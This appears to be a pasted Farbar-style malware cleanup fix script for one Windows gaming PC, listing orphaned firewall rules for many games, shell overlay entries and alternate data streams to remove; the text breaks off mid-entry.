Malware Log Analysis

shared / lyzmultig
Login
content copied

content

Start:: SystemRestore: On CreateRestorePoint: CloseProcesses: 2026-06-10 23:54 - 2025-10-06 14:52 - 000000000 ____D C:\Users\ROG\AppData\Roaming\RenPy ShellIconOverlayIdentifiers: [ .WorkspaceExt0] -> {C568C78A-652C-425B-8E6B-FFA73043302D} => -> No File ShellIconOverlayIdentifiers: [ .WorkspaceExt1] -> {2A6FE247-5DA3-4732-9626-77820518FD77} => -> No File ShellIconOverlayIdentifiers: [ .WorkspaceExt2] -> {FF895810-293B-464A-93F2-82D11E07EEC8} => -> No File AlternateDataStreams: C:\Windows\Temp:A96ECA9E [37] AlternateDataStreams: C:\Windows\Temp:DeviceUUID [64] AlternateDataStreams: C:\Windows\tracing:? [13] AlternateDataStreams: C:\Users\ROG\Application Data:087af38c42a2e82c16575997b2d7a77b [394] AlternateDataStreams: C:\Users\ROG\Application Data:48e63d4de0a63256000858a7c61c87df [394] AlternateDataStreams: C:\Users\ROG\Application Data:86dabf594e68b7fb8ac56037576b6591 [394] AlternateDataStreams: C:\Users\ROG\Application Data:dc2fbb8b303cabdec52ed28927f75974 [394] AlternateDataStreams: C:\Users\ROG\Application Data:e544b77f725e4e36f962a435d8206045 [394] AlternateDataStreams: C:\Users\ROG\AppData\Roaming:087af38c42a2e82c16575997b2d7a77b [394] AlternateDataStreams: C:\Users\ROG\AppData\Roaming:48e63d4de0a63256000858a7c61c87df [394] AlternateDataStreams: C:\Users\ROG\AppData\Roaming:86dabf594e68b7fb8ac56037576b6591 [394] AlternateDataStreams: C:\Users\ROG\AppData\Roaming:dc2fbb8b303cabdec52ed28927f75974 [394] AlternateDataStreams: C:\Users\ROG\AppData\Roaming:e544b77f725e4e36f962a435d8206045 [394] AlternateDataStreams: C:\Users\ROG\AppData\Local\Temp:$DATA​ [34] FirewallRules: [{C34E0521-459C-497A-A507-E99CD9E27999}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File FirewallRules: [{EC616013-94DB-4EF8-8240-F9A1FCBE6100}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File FirewallRules: [{99E23661-C674-415C-B986-731B58938624}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Subverse\Subverse.exe => No File FirewallRules: [{588094E4-482F-40C9-B199-49F973481A9E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Subverse\Subverse.exe => No File FirewallRules: [TCP Query User{AA52C722-7C29-4348-899A-EF19F61041EE}C:\program files (x86)\steam\steamapps\common\subverse\subverse\binaries\win64\subverse-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\subverse\subverse\binaries\win64\subverse-win64-shipping.exe => No File FirewallRules: [UDP Query User{021D3EFF-1E8A-403A-AB14-C8EC00AAD797}C:\program files (x86)\steam\steamapps\common\subverse\subverse\binaries\win64\subverse-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\subverse\subverse\binaries\win64\subverse-win64-shipping.exe => No File FirewallRules: [TCP Query User{2BDDBCF8-0C37-4DAB-8B0E-1EBC243259BC}D:\himei\himei.exe] => (Allow) D:\himei\himei.exe => No File FirewallRules: [UDP Query User{66648C95-9E2C-43FC-866F-6F8CC33E12DD}D:\himei\himei.exe] => (Allow) D:\himei\himei.exe => No File FirewallRules: [{07C88A95-A050-4F76-9ACD-3279C8319594}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\KingdomComeDeliverance2\Bin\Win64MasterMasterSteamPGO\KingdomCome.exe => No File FirewallRules: [{1EB4C969-42A0-4295-8AD8-CC5007DE1591}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\KingdomComeDeliverance2\Bin\Win64MasterMasterSteamPGO\KingdomCome.exe => No File FirewallRules: [{892AF7CA-75E7-40CD-94B9-8DA22ED62E8D}] => (Allow) D:\SteamLibrary\steamapps\common\Dead by Daylight\DeadByDaylight.exe => No File FirewallRules: [{1BDFBF43-CEC7-4EB6-83A1-C34E9C6CE30C}] => (Allow) D:\SteamLibrary\steamapps\common\Dead by Daylight\DeadByDaylight.exe => No File FirewallRules: [TCP Query User{DEA11F8E-C59C-46F0-9740-B64AAE5FEC3B}D:\punishing gray raven\punishing gray raven game\pgr.exe] => (Allow) D:\punishing gray raven\punishing gray raven game\pgr.exe => No File FirewallRules: [UDP Query User{F9AB405F-02EB-45F1-90BD-042379C14FDA}D:\punishing gray raven\punishing gray raven game\pgr.exe] => (Allow) D:\punishing gray raven\punishing gray raven game\pgr.exe => No File FirewallRules: [{30C24A2B-3B2B-4286-8071-5B9D450DB23B}] => (Allow) D:\SteamLibrary\steamapps\common\The Hundred Line -Last Defense Academy- Demo Ver\HUNDRED_LINE_Demo.exe => No File FirewallRules: [{AAC84396-4FDC-4DE9-8180-F8011B0F6C1A}] => (Allow) D:\SteamLibrary\steamapps\common\The Hundred Line -Last Defense Academy- Demo Ver\HUNDRED_LINE_Demo.exe => No File FirewallRules: [{BED2D25C-F496-425A-8F1B-4A3BED299086}] => (Allow) D:\SteamLibrary\steamapps\common\SNOWBREAK\Game\Binaries\Win64\Game.exe => No File FirewallRules: [{543795CC-EE7F-40CB-BE23-D96A65E6AED1}] => (Allow) D:\SteamLibrary\steamapps\common\SNOWBREAK\Game\Binaries\Win64\Game.exe => No File FirewallRules: [{184C3857-930E-4C94-B299-876658F53C95}] => (Allow) D:\SteamLibrary\steamapps\common\House Flipper 2\HouseFlipper2.exe => No File FirewallRules: [{E78B17E2-B39D-4F73-A779-C43A05035E11}] => (Allow) D:\SteamLibrary\steamapps\common\House Flipper 2\HouseFlipper2.exe => No File FirewallRules: [TCP Query User{9E7D2C1B-B0B2-4ECF-ABC0-F8E52B9C13E9}C:\program files (x86)\steam\steamapps\common\guilty gear strive\red\binaries\win64\ggst-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\guilty gear strive\red\binaries\win64\ggst-win64-shipping.exe => No File FirewallRules: [UDP Query User{FB014896-4C1C-422C-AD88-3A783361021E}C:\program files (x86)\steam\steamapps\common\guilty gear strive\red\binaries\win64\ggst-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\guilty gear strive\red\binaries\win64\ggst-win64-shipping.exe => No File FirewallRules: [TCP Query User{D08D7CE3-0BB7-4FAE-9C23-99598321BBCD}C:\program files (x86)\steam\steamapps\common\granblue fantasy versus rising\red\binaries\win64\gbvsr-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\granblue fantasy versus rising\red\binaries\win64\gbvsr-win64-shipping.exe => No File FirewallRules: [UDP Query User{2B4C3A27-BECF-484F-89C3-9D9CFBCC1A9E}C:\program files (x86)\steam\steamapps\common\granblue fantasy versus rising\red\binaries\win64\gbvsr-win64-shipping.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\granblue fantasy versus rising\red\binaries\win64\gbvsr-win64-shipping.exe => No File FirewallRules: [{8704371F-8644-4E77-88B7-78E3365480E0}] => (Allow) D:\SteamLibrary\steamapps\common\Strinova\Launcher\Strinova.exe => No File FirewallRules: [{CF0E98FC-6B81-49FF-97B4-85C9C936FA2D}] => (Allow) D:\SteamLibrary\steamapps\common\Strinova\Launcher\Strinova.exe => No File FirewallRules: [{185A8439-CED6-4475-9FF6-50F53A21CF7B}] => (Allow) D:\SteamLibrary\steamapps\common\Eternal Return\EternalReturn.exe => No File FirewallRules: [{2B9DCF81-CD87-4CFC-A560-2B21FB099C50}] => (Allow) D:\SteamLibrary\steamapps\common\Eternal Return\EternalReturn.exe => No File FirewallRules: [{3736AB8B-BA94-44C2-B2D2-253708093BD3}] => (Allow) D:\SteamLibrary\steamapps\common\P3R\P3R\Binaries\Win64\P3R.exe => No File FirewallRules: [{BEEE18E6-2981-486A-B47B-707AA2FFA5CF}] => (Allow) D:\SteamLibrary\steamapps\common\P3R\P3R\Binaries\Win64\P3R.exe => No File FirewallRules: [{91B2903C-82A8-4F41-B102-26C0AA50012D}] => (Allow) D:\SteamLibrary\steamapps\common\RimWorld\RimWorldWin64.exe => No File FirewallRules: [{C0CAF21F-0403-4937-995E-91722C148E64}] => (Allow) D:\SteamLibrary\steamapps\common\RimWorld\RimWorldWin64.exe => No File FirewallRules: [TCP Query User{0E371936-8CC7-4C99-8EA0-5ED31E83AB31}D:\steamlibrary\steamapps\common\the first descendant\m1\binaries\win64\m1-win64-shipping.exe] => (Allow) D:\steamlibrary\steamapps\common\the first descendant\m1\binaries\win64\m1-win64-shipping.exe => No File FirewallRules: [UDP Query User{442B72B4-A4E7-4284-8914-0D5D795114D2}D:\steamlibrary\steamapps\common\the first descendant\m1\binaries\win64\m1-win64-shipping.exe] => (Allow) D:\steamlibrary\steamapps\common\the first descendant\m1\binaries\win64\m1-win64-shipping.exe => No File FirewallRules: [{83136A01-F1AA-40AF-925F-41721BDF310E}] => (Allow) D:\SteamLibrary\steamapps\common\Satisfactory\FactoryGameSteam.exe => No File FirewallRules: [{D323D28D-3BF9-4F44-B1B1-208DD240FB80}] => (Allow) D:\SteamLibrary\steamapps\common\Satisfactory\FactoryGameSteam.exe => No File FirewallRules: [TCP Query User{F3EF0394-F540-4BD1-BBDF-1B5D21D9A4E4}E:\ue_5.6\engine\binaries\win64\unrealeditor.exe] => (Allow) E:\ue_5.6\engine\binaries\win64\unrealeditor.exe => No File FirewallRules: [UDP Query User{E1249B87-E693-45A6-B5C7-6EB154A4FEC2}E:\ue_5.6\engine\binaries\win64\unrealeditor.exe] => (Allow) E:\ue_5.6\engine\binaries\win64\unrealeditor.exe => No File FirewallRules: [{00E199C3-1301-4CCF-9E05-91BE2B57444E}] => (Allow) E:\SteamLibrary\steamapps\common\UmamusumePrettyDerby\UmamusumePrettyDerby.exe => No File FirewallRules: [{47CCBFA5-A9F3-4848-A70F-76EE4F9DE136}] => (Allow) E:\SteamLibrary\steamapps\common\UmamusumePrettyDerby\UmamusumePrettyDerby.exe => No File FirewallRules: [{2CA2177F-4BED-4937-BC44-D24CF3A758F2}] => (Allow) E:\P5XSEA\P5XLaunch\P5XGame.exe => No File FirewallRules: [{6AB333B9-FD31-4524-BF37-24E13AFE5731}] => (Allow) E:\P5XSEA\P5XLaunch\P5XGame.exe => No File FirewallRules: [{CD0C462E-62A1-4482-BF72-7A6CFD80D203}] => (Allow) E:\P5XSEA\P5XLaunch\P5XUpdate.exe => No File FirewallRules: [{EB9DE343-2436-4DDB-B5AF-7056D8A01B75}] => (Allow) E:\P5XSEA\P5XLaunch\P5XUpdate.exe => No File FirewallRules: [{A836046C-C1B6-4256-AA55-27ED0230B195}] => (Allow) E:\P5XSEA\P5XLaunch\P5XBrowser.exe => No File FirewallRules: [{24A87F13-6F02-4E53-AA80-876EC173E023}] => (Allow) E:\P5XSEA\P5XLaunch\P5XBrowser.exe => No File FirewallRules: [{A7C8F6F6-F9CF-41B7-9623-56E8D6C37FCC}] => (Allow) E:\P5XSEA\P5XLaunch\P5XWebBooster.exe => No File FirewallRules: [{79BDF6A7-A07E-4495-A218-63FA5FB4D4B2}] => (Allow) E:\P5XSEA\P5XLaunch\P5XWebBooster.exe => No File FirewallRules: [{2A5B1784-E17D-41C6-BDE1-ECA88071C0E3}] => (Allow) E:\P5XSEA\client\pc\P5X.exe => No File FirewallRules: [{3B813987-11CA-46EA-AC1C-8EA6D6452B22}] => (Allow) E:\P5XSEA\client\pc\P5X.exe => No File FirewallRules: [TCP Query User{5BC1BAEC-3F44-4776-86FE-03726CE4E396}E:\steamlibrary\steamapps\common\the finals\discovery\binaries\win64\discovery.exe] => (Allow) E:\steamlibrary\steamapps\common\the finals\discovery\binaries\win64\discovery.exe => No File FirewallRules: [UDP Query User{8C1C9534-F4EA-4B41-8E3E-0F5BBF31357F}E:\steamlibrary\steamapps\common\the finals\discovery\binaries\win64\discovery.exe] => (Allow) E:\steamlibrary\steamapps\common\the finals\discovery\binaries\win64\discovery.exe => No File FirewallRules: [{A79BE26F-3937-436F-8F98-9B81BA3046C7}] => (Allow) C:2\SteamLibrary\steamapps\common\SUPERVIVE\SUPERVIVE.exe => No File FirewallRules: [{8078661D-49C1-4659-BA5F-8B0885FA315C}] => (Allow) C:2\SteamLibrary\steamapps\common\SUPERVIVE\SUPERVIVE.exe => No File FirewallRules: [{E97895F8-1864-43C5-B544-74EFCFE6E197}] => (Allow) C:4\SteamLibrary\steamapps\common\Reverse 1999\reverse1999.exe => No File FirewallRules: [{43E230B6-A59F-4A8D-B7D4-4352723FBC85}] => (Allow) C:4\SteamLibrary\steamapps\common\Reverse 1999\reverse1999.exe => No File FirewallRules: [TCP Query User{4FA84516-EBFA-4531-BC7E-F904EC19E699}E:\silver and blood\silverandblood\silverandblood.exe] => (Block) E:\silver and blood\silverandblood\silverandblood.exe => No File FirewallRules: [UDP Query User{EC6EF181-0D9C-45BF-9C71-A333E93C2F50}E:\silver and blood\silverandblood\silverandblood.exe] => (Block) E:\silver and blood\silverandblood\silverandblood.exe => No File FirewallRules: [{5DB4C7A6-044F-43E4-9323-4C66157B9D97}] => (Allow) E:\SteamLibrary\steamapps\common\Ready Or Not\Engine\Binaries\Win64\CrashReporter.exe => No File FirewallRules: [{98AD6932-9C40-49AD-924A-9E36CE981195}] => (Allow) E:\SteamLibrary\steamapps\common\Ready Or Not\Engine\Binaries\Win64\CrashReporter.exe => No File FirewallRules: [{DD3D5786-AFB4-41C3-AD2C-3F32F4CC925B}] => (Allow) E:\SteamLibrary\steamapps\common\SMITE 2\Windows\Hemingway.exe => No File FirewallRules: [{5EDEE02C-F4C1-4248-933E-8A7F61BFF291}] => (Allow) E:\SteamLibrary\steamapps\common\SMITE 2\Windows\Hemingway.exe => No File FirewallRules: [TCP Query User{C77E7A7F-ABD5-4131-9B1F-0ED75301FA83}E:\steamlibrary\steamapps\common\ready or not\readyornot\binaries\win64\readyornotsteam-win64-shipping.exe] => (Allow) E:\steamlibrary\steamapps\common\ready or not\readyornot\binaries\win64\readyornotsteam-win64-shipping.exe => No File FirewallRules: [UDP Query User{84EF8759-21A3-4232-A35B-7A55D2D3209C}E:\steamlibrary\steamapps\common\ready or not\readyornot\binaries\win64\readyornotsteam-win64-shipping.exe] => (Allow) E:\steamlibrary\steamapps\common\ready or not\readyornot\binaries\win64\readyornotsteam-win64-shipping.exe => No File FirewallRules: [TCP Query User{764A1D5A-4C24-400A-8D36-B4717FEE9D0B}E:\games\epicseven\epicseven.exe] => (Allow) E:\games\epicseven\epicseven.exe => No File FirewallRules: [UDP Query User{D1E32FFB-BCEF-4275-9189-BC0DC02CB80E}E:\games\epicseven\epicseven.exe] => (Allow) E:\games\epicseven\epicseven.exe => No File FirewallRules: [TCP Query User{D97B5D46-9153-46E9-A907-091B7EBD7DB4}E:\steamlibrary\steamapps\common\fragpunk\fragpunk\binaries\win64\fragpunk.exe] => (Allow) E:\steamlibrary\steamapps\common\fragpunk\fragpunk\binaries\win64\fragpunk.exe => No File FirewallRules: [UDP Query User{4660A3CF-7AC0-4E20-9F6F-756B237C84B8}E:\steamlibrary\steamapps\common\fragpunk\fragpunk\binaries\win64\fragpunk.exe] => (Allow) E:\steamlibrary\steamapps\common\fragpunk\fragpunk\binaries\win64\fragpunk.exe => No File FirewallRules: [TCP Query User{70C1E48D-CFFC-48A6-A109-FF4BBFB829A2}C:\users\rog\appdata\local\temp\e91bd34f-40a9-491a-a38b-a2eb34b3b82b_hitomi_downloader_gui.zip.82b\hitomi_downloader_gui.exe] => (Allow) C:\users\rog\appdata\local\temp\e91bd34f-40a9-491a-a38b-a2eb34b3b82b_hitomi_downloader_gui.zip.82b\hitomi_downloader_gui.exe => No File FirewallRules: [UDP Query User{906D7050-C85F-4B4F-85E7-97DB5EA5674A}C:\users\rog\appdata\local\temp\e91bd34f-40a9-491a-a38b-a2eb34b3b82b_hitomi_downloader_gui.zip.82b\hitomi_downloader_gui.exe] => (Allow) C:\users\rog\appdata\local\temp\e91bd34f-40a9-491a-a38b-a2eb34b3b82b_hitomi_downloader_gui.zip.82b\hitomi_downloader_gui.exe => No File FirewallRules: [TCP Query User{F7C5C52B-2E1F-4E7C-8916-33D163E7FFBE}E:\steamlibrary\steamapps\common\battlefield 1\bf1.exe] => (Block) E:\steamlibrary\steamapps\common\battlefield 1\bf1.exe => No File FirewallRules: [UDP Query User{3CC151EF-D458-4E5F-BE86-1333C6E79D42}E:\steamlibrary\steamapps\common\battlefield 1\bf1.exe] => (Block) E:\steamlibrary\steamapps\common\battlefield 1\bf1.exe => No File FirewallRules: [TCP Query User{0802517B-2CE8-4C1A-BFFA-A620867AAD29}E:\steamlibrary\steamapps\common\glacier events\bf6event.exe] => (Allow) E:\steamlibrary\steamapps\common\glacier events\bf6event.exe => No File FirewallRules: [UDP Query User{07F13587-E627-47DB-87F6-A81B12EA5BB2}E:\steamlibrary\steamapps\common\glacier events\bf6event.exe] => (Allow) E:\steamlibrary\steamapps\common\glacier events\bf6event.exe => No File FirewallRules: [TCP Query User{6C754FCD-D15A-408E-94B5-9E038FB1DC50}E:\steamlibrary\steamapps\common\farlight 84\windowsclient\solarland\binaries\win64\solarlandclient-win64-shipping.exe] => (Allow) E:\steamlibrary\steamapps\common\farlight 84\windowsclient\solarland\binaries\win64\solarlandclient-win64-shipping.exe => No File FirewallRules: [UDP Query User{8137D99D-DE05-4C97-B198-F9486D4C398A}E:\steamlibrary\steamapps\common\farlight 84\windowsclient\solarland\binaries\win64\solarlandclient-win64-shipping.exe] => (Allow) E:\steamlibrary\steamapps\common\farlight 84\windowsclient\solarland\binaries\win64\solarlandclient-win64-shipping.exe => No File FirewallRules: [TCP Query User{9C3EF630-D8AE-4989-983F-FB821FE9D382}E:\steamlibrary\steamapps\common\the first descendant\m1\binaries\win64\m1-win64-shipping.exe] => (Allow) E:\steamlibrary\steamapps\common\the first descendant\m1\binaries\win64\m1-win64-shipping.exe => No File FirewallRules: [UDP Query User{A55D722B-70E0-4C52-AC0D-D56D0EA5AB39}E:\steamlibrary\steamapps\common\the first descendant\m1\binaries\win64\m1-win64-shipping.exe] => (Allow) E:\steamlibrary\steamapps\common\the first descendant\m1\binaries\win64\m1-win64-shipping.exe => No File FirewallRules: [TCP Query User{D8DFDB5D-6AD1-43CA-A180-856E11C6E011}E:\steamlibrary\steamapps\common\inzoi\blueclient\binaries\win64\inzoi-win64-shipping.exe] => (Allow) E:\steamlibrary\steamapps\common\inzoi\blueclient\binaries\win64\inzoi-win64-shipping.exe => No File FirewallRules: [UDP Query User{0C95DBB6-38C1-45F6-8D0D-383656B6B766}E:\steamlibrary\steamapps\common\inzoi\blueclient\binaries\win64\inzoi-win64-shipping.exe] => (Allow) E:\steamlibrary\steamapps\common\inzoi\blueclient\binaries\win64\inzoi-win64-shipping.exe => No File FirewallRules: [{CBAFCABC-7361-47FE-BD9C-2D7A883D718A}] => (Allow) C:3\SteamLibrary\steamapps\common\Path of Exile 2\PathOfExileSteam.exe => No File FirewallRules: [{C1B943E1-DF33-411A-BC60-5B96895419C6}] => (Allow) C:3\SteamLibrary\steamapps\common\Path of Exile 2\PathOfExileSteam.exe => No File FirewallRules: [TCP Query User{E7DF119A-FE8B-4D54-9B17-281C1FA881D1}E:\riot games\riot client\riotclientelectron\riot client.exe] => (Allow) E:\riot games\riot client\riotclientelectron\riot client.exe => No File FirewallRules: [UDP Query User{01967108-D2C1-4025-BA1C-E387B30E5353}E:\riot games\riot client\riotclientelectron\riot client.exe] => (Allow) E:\riot games\riot client\riotclientelectron\riot client.exe => No File FirewallRules: [TCP Query User{3C6F2FDA-4583-420F-92E8-79EFEE9AC804}E:\riot games\2xko\live\lion\binaries\win64\lion-win64-shipping.exe] => (Allow) E:\riot games\2xko\live\lion\binaries\win64\lion-win64-shipping.exe => No File FirewallRules: [UDP Query User{8F9242BB-FCC7-426E-8F9F-B0C92FA229DD}E:\riot games\2xko\live\lion\binaries\win64\lion-win64-shipping.exe] => (Allow) E:\riot games\2xko\live\lion\binaries\win64\lion-win64-shipping.exe => No File FirewallRules: [TCP Query User{E3384B8A-8E6D-43BD-966A-D23AF02F97ED}E:\steamlibrary\steamapps\common\the finals\discovery\binaries\win64\discovery-e.exe] => (Allow) E:\steamlibrary\steamapps\common\the finals\discovery\binaries\win64\discovery-e.exe => No File FirewallRules: [UDP Query User{6A0F8CA0-4BF3-40D4-89F8-93A345C88A1F}E:\steamlibrary\steamapps\common\the finals\discovery\binaries\win64\discovery-e.exe] => (Allow) E:\steamlibrary\steamapps\common\the finals\discovery\binaries\win64\discovery-e.exe => No File FirewallRules: [TCP Query User{8FDD3441-ACBE-432C-8195-85721DF1B8A7}E:\steamlibrary\steamapps\common\the finals\discovery\binaries\win64\discovery-d.exe] => (Allow) E:\steamlibrary\steamapps\common\the finals\discovery\binaries\win64\discovery-d.exe => No File FirewallRules: [UDP Query User{FBB024BA-7F13-4C1A-B64E-358ED23C77E4}E:\steamlibrary\steamapps\common\the finals\discovery\binaries\win64\discovery-d.exe] => (Allow) E:\steamlibrary\steamapps\common\the finals\discovery\binaries\win64\discovery-d.exe => No File FirewallRules: [{924FEF94-1A8A-4DB8-A827-D89CB0F1D21F}] => (Allow) E:\SteamLibrary\steamapps\common\ABInfinite\Launcher\arena_breakout_infinite_launcher.exe => No File FirewallRules: [{E94BA6CA-D115-4AC0-8B9D-B199DDE404F0}] => (Allow) E:\SteamLibrary\steamapps\common\ABInfinite\Launcher\arena_breakout_infinite_launcher.exe => No File FirewallRules: [{6C334B64-67DF-47DA-B14F-797C821D51DF}] => (Allow) E:\SteamLibrary\steamapps\common\SNOWBREAK\Game\Binaries\Win64\Game.exe => No File FirewallRules: [{EBBC8B55-F8E8-4CA9-9F89-E667A72CC6DA}] => (Allow) E:\SteamLibrary\steamapps\common\SNOWBREAK\Game\Binaries\Win64\Game.exe => No File FirewallRules: [{251A6A54-CBCA-4FDC-90E3-F19185EB22C5}] => (Allow) e:\program files\txgameassistant\appmarket\AppMarket.exe => No File FirewallRules: [{57999A2A-19FF-4DCD-A0F7-1CA1B252C26C}] => (Allow) e:\program files\txgameassistant\appmarket\TInst.exe => No File FirewallRules: [{7556672A-1062-4F6C-B830-22656AB1A748}] => (Allow) e:\program files\txgameassistant\appmarket\bugreport.exe => No File FirewallRules: [{AE65A2BD-1E13-4CB1-9F21-E8755C968F6A}] => (Allow) e:\program files\txgameassistant\appmarket\QQExternal.exe => No File FirewallRules: [{9BD5A509-56EC-418C-8AB1-45F735964237}] => (Allow) e:\program files\txgameassistant\appmarket\GameDownload.exe => No File FirewallRules: [{B100E896-5941-4D92-933D-5DC3342338FE}] => (Allow) e:\program files\txgameassistant\appmarket\GF186\TUpdate.exe => No File FirewallRules: [{DDD7282E-4A85-4082-9B43-73A897169C9B}] => (Allow) E:\Program Files\TxGameAssistant\AppMarket\DL\syzs_dl_svr.exe => No File FirewallRules: [{787B4CBB-47D0-4B80-B4FA-8B0910D4FC06}] => (Allow) E:\Program Files\TxGameAssistant\AppMarket\DL\syzs_dl_svr.exe => No File FirewallRules: [{FAC84B60-E106-49A5-AA5E-8AB4FF088759}] => (Allow) E:\Program Files\TxGameAssistant\AppMarket\DL\syzs_dl_svr.exe => No File FirewallRules: [{07F9CE6A-2FA2-4781-A3BA-1F21743D707A}] => (Allow) E:\Program Files\TxGameAssistant\AppMarket\DL\syzs_dl_svr.exe => No File FirewallRules: [{5F0FAC8A-ABE8-4BE8-B5A7-BA96C9C24EE0}] => (Allow) E:\Program Files\TxGameAssistant\AppMarket\DL\syzs_dl_svr.exe => No File FirewallRules: [{68B9270F-CB60-4C48-A42F-217ACFE690AC}] => (Allow) E:\Program Files\TxGameAssistant\AppMarket\DL\syzs_dl_svr.exe => No File FirewallRules: [{E00F957A-9117-428A-BE16-69E2E3C9D0E0}] => (Allow) e:\program files\txgameassistant\ui\AndroidEmulator.exe => No File FirewallRules: [{3F09656E-68D4-4FD8-B42B-DBED55CBD9BF}] => (Allow) e:\program files\txgameassistant\ui\AndroidEmulatorEx.exe => No File FirewallRules: [{44E65C36-EFF5-44AA-911E-22AF34F8FAF6}] => (Allow) e:\program files\txgameassistant\ui\AndroidEmulatorEn.exe => No File FirewallRules: [{CAC2FD05-14F8-4DDA-A62C-A2B2CD360522}] => (Allow) e:\program files\txgameassistant\ui\adb.exe => No File FirewallRules: [{284762D8-BCDE-4327-8CF7-AE26221BD443}] => (Allow) e:\program files\txgameassistant\ui\TInst.exe => No File FirewallRules: [{83CB287F-966B-4A1A-832A-5B93EF399578}] => (Allow) e:\program files\txgameassistant\ui\bugreport.exe => No File FirewallRules: [{58BD51AC-2DB3-41D6-896A-181AA00E7B16}] => (Allow) e:\program files\txgameassistant\ui\TxGaDcc.exe => No File FirewallRules: [TCP Query User{3358797D-2498-445F-87FA-3CB030ACB6F2}E:\steamlibrary\steamapps\common\battlefield 6\bf6.exe] => (Allow) E:\steamlibrary\steamapps\common\battlefield 6\bf6.exe => No File FirewallRules: [UDP Query User{C4306E96-FEF4-4F12-8073-8826D8B7DDB9}E:\steamlibrary\steamapps\common\battlefield 6\bf6.exe] => (Allow) E:\steamlibrary\steamapps\common\battlefield 6\bf6.exe => No File FirewallRules: [{C3349C3F-EF70-484F-9909-3F5830AC92E1}] => (Allow) E:\SteamLibrary\steamapps\common\SNOWBREAK\Game\Binaries\Win64\Game.exe => No File FirewallRules: [{EF0C9FA4-9326-4159-A904-63BF6D41A9E3}] => (Allow) E:\SteamLibrary\steamapps\common\SNOWBREAK\Game\Binaries\Win64\Game.exe => No File FirewallRules: [TCP Query User{0F20456E-61BA-45F4-AD61-BDE49B99EC6E}E:\steamlibrary\steamapps\common\arc raiders playtest\pioneergame\binaries\win64\pioneergame.exe] => (Allow) E:\steamlibrary\steamapps\common\arc raiders playtest\pioneergame\binaries\win64\pioneergame.exe => No File FirewallRules: [UDP Query User{C6FC0DAC-AAF5-44AC-98DD-45604DDF4388}E:\steamlibrary\steamapps\common\arc raiders playtest\pioneergame\binaries\win64\pioneergame.exe] => (Allow) E:\steamlibrary\steamapps\common\arc raiders playtest\pioneergame\binaries\win64\pioneergame.exe => No File FirewallRules: [TCP Query User{C7F652FD-C5A2-4B28-AF80-4DBFD79867E7}E:\yostargames\stellasora_en\stellasora.exe] => (Allow) E:\yostargames\stellasora_en\stellasora.exe => No File FirewallRules: [UDP Query User{F4B24AF4-9189-4D40-A6AA-0403B87A665D}E:\yostargames\stellasora_en\stellasora.exe] => (Allow) E:\yostargames\stellasora_en\stellasora.exe => No File FirewallRules: [TCP Query User{7ECB295B-821B-4160-934A-0E65A73FCF22}E:\games\chaoszeronightmare\bin\ssr-stove-shield.exe] => (Allow) E:\games\chaoszeronightmare\bin\ssr-stove-shield.exe => No File FirewallRules: [UDP Query User{0F5EFED8-2962-4781-A3B1-4E2C58DA9BFC}E:\games\chaoszeronightmare\bin\ssr-stove-shield.exe] => (Allow) E:\games\chaoszeronightmare\bin\ssr-stove-shield.exe => No File FirewallRules: [{82621C2C-F0CB-4B64-A8E9-3EBCB6A228AC}] => (Allow) E:\SteamLibrary\steamapps\common\Hades II\Ship\Hades2.exe => No File FirewallRules: [{503D2F0A-7AF9-4643-A354-3DF3D4CA64EF}] => (Allow) E:\SteamLibrary\steamapps\common\Hades II\Ship\Hades2.exe => No File FirewallRules: [TCP Query User{4328A1B7-A527-423D-8A27-1D0E1623A598}E:\steamlibrary\steamapps\common\arc raiders\pioneergame\binaries\win64\pioneergame.exe] => (Allow) E:\steamlibrary\steamapps\common\arc raiders\pioneergame\binaries\win64\pioneergame.exe => No File FirewallRules: [UDP Query User{99248889-6166-493A-95D4-B5D87D19695C}E:\steamlibrary\steamapps\common\arc raiders\pioneergame\binaries\win64\pioneergame.exe] => (Allow) E:\steamlibrary\steamapps\common\arc raiders\pioneergame\binaries\win64\pioneergame.exe => No File FirewallRules: [TCP Query User{F4DF5DD7-DC70-43EE-B5B2-71E278A1452F}E:\seasunsnowbreakos\game\snowbreak\game\game\binaries\win64\game.exe] => (Allow) E:\seasunsnowbreakos\game\snowbreak\game\game\binaries\win64\game.exe => No File FirewallRules: [UDP Query User{AAAE8AB0-C34E-4B92-9D2C-F420814E8081}E:\seasunsnowbreakos\game\snowbreak\game\game\binaries\win64\game.exe] => (Allow) E:\seasunsnowbreakos\game\snowbreak\game\game\binaries\win64\game.exe => No File FirewallRules: [TCP Query User{1DD16F8D-8E3F-4752-B5B8-9F9C75FB7DC8}E:\steamlibrary\steamapps\common\naraka bladepoint\narakabladepoint.exe] => (Allow) E:\steamlibrary\steamapps\common\naraka bladepoint\narakabladepoint.exe => No File FirewallRules: [UDP Query User{F0C2E0A3-03F7-4F1E-BDF6-A9D31ED9D530}E:\steamlibrary\steamapps\common\naraka bladepoint\narakabladepoint.exe] => (Allow) E:\steamlibrary\steamapps\common\naraka bladepoint\narakabladepoint.exe => No File FirewallRules: [TCP Query User{3082F3A5-64B3-4CAC-8597-A5CEC372D4C3}E:\steamlibrary\steamapps\common\naraka bladepoint\ccmini\ccmini_new\ccmini.exe] => (Allow) E:\steamlibrary\steamapps\common\naraka bladepoint\ccmini\ccmini_new\ccmini.exe => No File FirewallRules: [UDP Query User{9759F359-9C63-48D3-8950-0E0B756313A6}E:\steamlibrary\steamapps\common\naraka bladepoint\ccmini\ccmini_new\ccmini.exe] => (Allow) E:\steamlibrary\steamapps\common\naraka bladepoint\ccmini\ccmini_new\ccmini.exe => No File FirewallRules: [{5F05D428-77F8-43A2-8D15-3675DAFAD974}] => (Allow) C:\Program Files (x86)\NCSOFT\Purple\yeti\yeti_v2.1.566.2511_global\purpleon.exe => No File FirewallRules: [{657D3270-52E6-4A41-9223-0AD0715E22EC}] => (Allow) C:\Program Files 